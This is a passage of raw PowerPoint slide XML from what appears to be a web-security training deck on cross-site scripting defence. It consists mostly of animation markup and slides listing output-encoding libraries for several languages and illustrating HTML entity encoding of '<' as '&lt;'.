                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="16" presetID="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mph" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="27" presetID="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mph" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="38" presetID="2" presetClass="entr" presetSubtype="2"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mph" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="49" presetID="2" presetClass="entr" presetSubtype="2"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mph" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="60" presetID="2" presetClass="entr" presetSubtype="2"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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="6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mph" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="67" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="71" presetID="2" presetClass="entr" presetSubtype="2"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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7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mph" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="78" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="81"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XSS Defense 1: Encoding Libraries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1471082" y="1371600"/>
            <a:ext cx="7298296" cy="592470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ruby on Rails</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>api.rubyonrails.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/classes/ERB/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Util.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="RubyOnRai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99" y="1293173"/>
            <a:ext cx="791314" cy="791314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="ph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50" y="2430327"/>
            <a:ext cx="810413" cy="429519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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39" y="3206692"/>
            <a:ext cx="545634" cy="73920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8" name="Picture 7" descr="NuG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103" y="4221008"/>
            <a:ext cx="650706" cy="624884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1471082" y="2222431"/>
            <a:ext cx="7417080" cy="915635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square"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a:t>PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>twig.sensiolabs.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/doc/filters/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>escape.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>framework.zend.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/manual/2.1/en/modules/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>zend.escaper.introduction.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1471082" y="3396427"/>
            <a:ext cx="7298296" cy="592470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"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a:t>Java (Updated September 2018)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>OWASP_Java_Encoder_Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1471082" y="4247258"/>
            <a:ext cx="7298296" cy="592470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"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a:t>.NET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>AntiXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Library (v4.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>NuGet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> released June 2, 2014)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>www.nuget.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/packages/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>AntiXss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1471082" y="5098090"/>
            <a:ext cx="7298296" cy="915635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"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a:t>Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Jinja2 Framework has built it and standalone escaping capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>MarkupSafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>" library</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="591639" y="5095678"/>
            <a:ext cx="737631" cy="737631"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2807826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1" grpId="0"/>
      <p:bldP spid="22" grpId="0"/>
      <p:bldP spid="23"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709"/>
            <a:ext cx="9144000" cy="6356350"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="84000">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386389278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093"/>
            <a:ext cx="8229600" cy="4353107"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="16000">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="27600" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16000">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336501185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HTML Entity Encoding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2494784" y="1525777"/>
            <a:ext cx="685228" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3261961" y="1525777"/>
            <a:ext cx="1233515" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
